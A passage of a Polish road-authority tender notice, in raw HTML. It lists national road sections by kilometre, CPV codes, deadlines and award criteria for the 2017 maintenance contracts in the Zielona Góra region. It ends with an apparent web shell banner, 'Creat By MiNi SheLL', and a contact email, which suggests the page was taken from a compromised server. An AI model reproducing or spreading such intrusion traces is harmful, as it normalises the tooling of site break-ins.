  odcinek od km  25+751 do km  28+288 =  2,537 km
- droga krajowa nr 22b
  odcinek od km   0+000 do km   11+017 = 11,017 km
  węzeł Lemierzyce (łącznice) 		      =   1,750 km
- droga krajowa nr 31
  odcinek od km  100+943 do km  135+400 = 34,457 km
  odcinek od km  107+790 do km  107+916 =   0,126 km (druga jezdnia)

Obwód Drogowy w Rzepinie   59,945 km
- droga krajowa nr 2
  odcinek od km 0+000 do km 1+995 (dwie jezdnie) =  3,990 km
- droga krajowa nr 29 
  Odcinek od km 0+000 do km 4+772 =  6,369 km (1,28 km druga jezdnia, 0,317 km trzecia  jezdnia) 
  odcinek od km 5+821 do km 36+000 = 31,64 km (1,461 km druga jezdnia)
- droga krajowa nr 31
  Odcinek od km 135+400 do km 138+924 = 4,167 (0,517 druga jezdnia)
- droga krajowa nr 92
  Odcinek od km 0+700 do km 14+479 = 13,779 km

Obwód Drogowy w Korytach   63,444 km
- droga krajowa nr 92
  Odcinek od km 14+479 do km 77+923 = 63,444 km

Obwód Drogowy w Krośnie Odrzańskim   67,715 km
- droga krajowa nr 29
  Odcinek od km 36+000 do km 57+628 = 21,628 km
- droga krajowa nr 32 
  Odcinek od km   0+000 do km 46+087 = 46,087 km 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45233140-2,
                    45233220-7,
                    45233221-4,
                    45232410-9,
                    45233290-8,
                    45233292-2,
                    77211400-6,
                    77211500-7,
                    77310000-6,
                    90610000-6,
                    34992200-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja jakości</td><td>20</td></tr><tr><td>Doświadczenie Kierownika robót</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamawiający wymaga, aby przedmiot zamówienia został zrealizowany w terminach: od 01.01.2017 r. do 30.04.2017 r.
Uwaga: W przypadku gdy umowa zostanie podpisana po dniu 01.01.2017r. termin rozpoczęcia ujęty jako 01.01.2017r. zostanie zmieniony na dzień podpisania umowy.<br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Roboty, usługi i dostawy w zakresie bieżącego utrzymania dróg krajowych administrowanych przez GDDKiA Odział Zielona Góra Rejon w Żarach  obejmujące drogi 12, 12a, 12e, 12f, 12n, 18, 27.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Roboty, usługi i dostawy w zakresie bieżącego utrzymania dróg krajowych administrowanych przez GDDKiA Odział Zielona Góra Rejon w Żarach  obejmujące drogi 12, 12a, 12e, 12f, 12n, 18, 27.
W szczególności prace dotyczyć będą robót drogowych, robót w zakresie nawierzchni dróg, oznakowania drogowego, utrzymywania porządku.
CZĘŚĆ Nr 4: Rejon w Żarach  ogółem 237,317 km (w rozbiciu na jedną jezdnię + łącznice) 
Obwód Drogowy w Trzebielu  144,187 km
- droga krajowa nr 12 
  odcinek 12n od km 0+000 do km 3+808 = 3,808 km
  odcinek 12 od km 2+687 do km 30+500 = 27,813 km
- droga krajowa nr 18
  odcinek jezdnia północna od km 0+000 do km 54+100 = 54,100 km
  odcinek jezdnia południowa od km 0+000 do km 54+100 = 54,100 km
  łącznice  km 4,366 km
Obwód drogowy w Żarach  93,130 km
- droga krajowa nr 12
  odcinek 12 od km 30+500 do km 39+074 = 8,574 km
  odcinek 12f od km 0+000 do km 1+742 = 1,742 km
  odcinek 12 od km 42+572 do km 52+021 = 9,449 km
  odcinek 12e od km 0+000 do km 4+651 = 4,651 km
  odcinek 12 od km 56+207 do km 67+987 =11,780 km
  odcinek 12a od km 0+000 do km 5+595 = 5,595 km
  odcinek 12 od km 72+927 do km 86+042 =13,115 km
 - droga krajowa nr 27 
  odcinek od km 0+000 do km 37+917 = 37,917 km 
  druga jezdnia od km 0+284 do km 0+591 = 0,307 km
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45233140-2,
                    45233220-7,
                    45233221-4,
                    45232410-9,
                    45233290-8,
                    45233292-2,
                    77211400-6,
                    77211500-7,
                    77310000-6,
                    90610000-6,
                    34992200-9,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja jakości</td><td>20</td></tr><tr><td>Doświadczenie Kierownika robót</td><td>20</td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamawiający wymaga, aby przedmiot zamówienia został zrealizowany w terminach: od 01.01.2017 r. do 30.04.2017 r.
Uwaga: W przypadku gdy umowa zostanie podpisana po dniu 01.01.2017r. termin rozpoczęcia ujęty jako 01.01.2017r. zostanie zmieniony na dzień podpisania umowy.<br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Roboty, usługi i dostawy w zakresie bieżącego utrzymania drogowych obiektów inżynierskich administrowanych przez GDDKiA Odział Zielona Góra Rejon w Gorzowie Wlkp. obejmujące drogi 22, 22a, 24, 24a, S3a, S3f.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Roboty, usługi i dostawy w zakresie bieżącego utrzymania drogowych obiektów inżynierskich administrowanych przez GDDKiA Odział Zielona Góra Rejon w Gorzowie Wlkp. obejmujące drogi 22, 22a, 24, 24a, S3a, S3f.
W szczególności prace dotyczyć będą robót w zakresie nawierzchni dróg, instalowania urządzeń ochronnych, robót budowlanych w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej.
Wykaz dróg krajowych objętych zadaniem:
Obwód Drogowy w Strzelcach  Kraj.  54,835 km
- droga krajowa nr 22
Odcinek od km 64+778 do km 119+613
Obwód Drogowy w Skwierzynie -67,551 km
- droga krajowa nr 22
Odcinek od km 28+288 do km 53+479
- droga krajowa nr 22a
Odcinek od km 0+000 do km 3+163
- droga krajowa nr 24
Odcinek od km 30+271 do km 52+241
Odcinek od km 54+343 do km 69+335
- droga krajowa nr 24a
Odcinek od km 0+000 do km 1+707
Łącznice  0.528 km
Obwód drogowy w Baczynie - 16,300 km
- droga krajowa nr S3a
Odcinek od km 80+942 do km 81+942
Odcinek od km 92+171 do km 92+602
- droga krajowa nr S3f
Odcinek od km 0+000 do km 10+229
Łącznice na węzłach (Małyszyn i Kostrzyński) = 3,038 km
Łącznice na węźle Kasprzaka  =   1,6 km   <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45233220-7,
                    45233292-2,
                    45232410-9,
                    45200000-9,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja jakości</td><td>20</td></tr><tr><td>Doświadczenie Kierownika robót</td><td>20</td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamawiający wymaga, aby przedmiot zamówienia został zrealizowany w terminach: 
Drogi 22, 22a, 24, 24a od 01.01.2017 r. do 30.04.2017 r. 
Droga S3a, S3f od 01.06.2017 r. do 30.09.2017 r.
Uwaga: W przypadku gdy umowa zostanie podpisana po dniu 01.01.2017r. termin rozpoczęcia ujęty jako 01.01.2017r. zostanie zmieniony na dzień podpisania umowy.<br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Roboty, usługi i dostawy w zakresie bieżącego utrzymania drogowych obiektów inżynierskich administrowanych przez GDDKiA Odział Zielona Góra Rejon w Nowej Soli obejmujące drogi 27, 32, 32a.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Roboty, usługi i dostawy w zakresie bieżącego utrzymania drogowych obiektów inżynierskich administrowanych przez GDDKiA Odział Zielona Góra Rejon w Nowej Soli obejmujące drogi 27, 32, 32a.
W szczególności prace dotyczyć będą robót w zakresie nawierzchni dróg, instalowania urządzeń ochronnych, robót budowlanych w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej.
Wykaz dróg krajowych objętych zadaniem:
Obwód Drogowy w Raculi -67,551 km
- droga krajowa nr 27
Odcinek od km 37+917 do km 63+808
- droga krajowa nr 32
Odcinek od km 46+087 do km 58+466
Odcinek od km 66+461 do km 67+054
Odcinek od km 71+567 do km 89+945
- droga krajowa nr 32a
Odcinek od km 0+250 do km 3+919<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45233220-7,
                    45233292-2,
                    45232410-9,
                    45200000-9,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja jakości</td><td>20</td></tr><tr><td>Doświadczenie Kierownika robót</td><td>20</td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamawiający wymaga, aby przedmiot zamówienia został zrealizowany w terminach: 
od 01.01.2017 r. do 30.04.2017 r.
Uwaga: W przypadku gdy umowa zostanie podpisana po dniu 01.01.2017r. termin rozpoczęcia ujęty jako 01.01.2017r. zostanie zmieniony na dzień podpisania umowy.<br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Roboty, usługi i dostawy w zakresie bieżącego utrzymania drogowych obiektów inżynierskich administrowanych przez GDDKiA Odział Zielona Góra Rejon w Słubicach obejmujące drogi 22, 22b, 31, 2, 29, 31, 92, 32.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Roboty, usługi i dostawy w zakresie bieżącego utrzymania drogowych obiektów inżynierskich administrowanych przez GDDKiA Odział Zielona Góra Rejon w Słubicach obejmujące drogi 22, 22b, 31, 2, 29, 31, 92, 32.
W szczególności prace dotyczyć będą robót w zakresie nawierzchni dróg, instalowania urządzeń ochronnych, robót budowlanych w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej.
Wykaz dróg krajowych objętych zadaniem:
Obwód Drogowy w Słubicach  64,616 km
Droga krajowa nr 22
odcinek od km 0+000 do km 14+729 = 14,729 km
odcinek od km 25+751 do km 28+288 = 2,537 km
Droga krajowa nr 22b
odcinek od km 0+000 do km 11+017 = 11,017 km
łącznice (węzeł Lemierzyce) km 1,75
Droga krajowa nr 31
odcinek od km 100+943 do km 135+400 = 34,457 km
odcinek od km 107+790 do km 107+ 916 (DK 31 ,,1 II jezdnia) = 0,126 km
Obwód Drogowy w Krośnie Odrzańskim  67,715 km
Droga krajowa nr 29
odcinek od km 36+000 do km 57+628 = 21,628 km
Droga krajowa nr 32
odcinek od km 0+000 do km 46+087 = 46,087 km
Obwód Drogowy w Korytach - 63,444 km
Droga krajowa nr 92
odcinek od km 34+479 do km 97+923  = 63,444 km
Droga krajowa nr 2
odcinek od km 0+000 do km 1+995  = 1,995 km (jezdnia północna)
odcinek od km 0+000 do km 1+995  = 1,995 km (jezdnia południowa)
Droga krajowa nr 29
29 ,,0 (od mostu granicznego ul. I-go Maja w Słubicach)
odcinek od km 0+000 do km 36+000  = 34,951 km
(odcinek wyłączony od km 4+772 do km 5+821 = 1,049 km (węzeł autostradowy                          w zarządzie AWSA))
* 29 ,,1 (od mostu granicznego ul. Kościuszki do Kościoła NMP w Słubicach)
odcinek od km 0+000 do km 1+188  = 1,188 km
* 29 ,,3 (od skrzyżowania z DK-31 do ul. Konopnickiej w Słubicach)
odcinek od km 0+344 do km 0+661 = 0,317 km
* 29 ,,2 (była droga celna)
odcinek od km 5+821 do km 7+282  = 1,461 km
* 29 łącznik ulic Kościuszki oraz Konopnickiej w km 0+661 = 0,092 km
Droga krajowa nr 31
odcinek od km 135+400 do km 138+924  = 3,65 km
odcinek od km 138+407 do km 138+924 (DK 31 ,,1  II jezdnia)  = 0,517 km
Droga krajowa nr 92
odcinek od km 20+700 do km 34+479  = 13,779 km


<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45233220-7,
                    45233292-2,
                    45232410-9,
                    45200000-9,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja jakości</td><td>20</td></tr><tr><td>Doświadczenie Kierownika robót</td><td>20</td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamawiający wymaga, aby przedmiot zamówienia został zrealizowany w terminach: od 01.04.2017 r. do 30.04.2017 r.
Uwaga: W przypadku gdy umowa zostanie podpisana po dniu 01.01.2017r. termin rozpoczęcia ujęty jako 01.01.2017r. zostanie zmieniony na dzień podpisania umowy.<br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Roboty, usługi i dostawy w zakresie bieżącego utrzymania drogowych obiektów inżynierskich administrowanych przez GDDKiA Odział Zielona Góra Rejon w Żarach obejmujące drogi 12, 12a, 12e, 12f, 12n, 18, 27.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Roboty, usługi i dostawy w zakresie bieżącego utrzymania drogowych obiektów inżynierskich administrowanych przez GDDKiA Odział Zielona Góra Rejon w Żarach obejmujące drogi 12, 12a, 12e, 12f, 12n, 18, 27.
W szczególności prace dotyczyć będą robót w zakresie nawierzchni dróg, instalowania urządzeń ochronnych, robót budowlanych w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej.
Wykaz dróg krajowych objętych zadaniem:
Obwód Drogowy w Trzebielu  89,821 km
- droga krajowa nr 12 
odcinek od km 2+687 do km 30+500 = 27,813 km
- droga krajowa nr 12n 
odcinek od km 0+000 do km 3+808 = 3,808 km
- droga krajowa nr 18 dwujezdniowa
odcinek od km 0+000 do km 54+100 = 54,100 km
łącznice na węzłach = 4,1 km
Obwód drogowy w Żarach  92,823 km
- droga krajowa nr 12
odcinek od km 30+500 do km 39+074 = 8,574 km
odcinek od km 42+572 do km 52+021 = 9,449 km
odcinek od km 56+207 do km 67+987 =11,780 km
odcinek od km 72+927 do km 86+042 =13,115 km
- droga krajowa nr 12f
odcinek od km 0+000 do km 1+742 = 1,742 km
- droga krajowa nr 12e
odcinek od km 0+000 do km 4+651 = 4,651 km
- droga krajowa nr 12a
odcinek od km 0+000 do km 5+595 = 5,595 km
- droga krajowa nr 27 
odcinek od km 0+000 do km 37+917 = 37,917 km <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45233220-7,
                    45233292-2,
                    45232410-9,
                    45200000-9,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja jakości</td><td>20</td></tr><tr><td>Doświadczenie Kierownika robót</td><td>20</td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Zamawiający wymaga, aby przedmiot zamówienia został zrealizowany w terminach: 
od 01.01.2017 r. do 30.04.2017 r.
Uwaga: W przypadku gdy umowa zostanie podpisana po dniu 01.01.2017r. termin rozpoczęcia ujęty jako 01.01.2017r. zostanie zmieniony na dzień podpisania umowy.<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com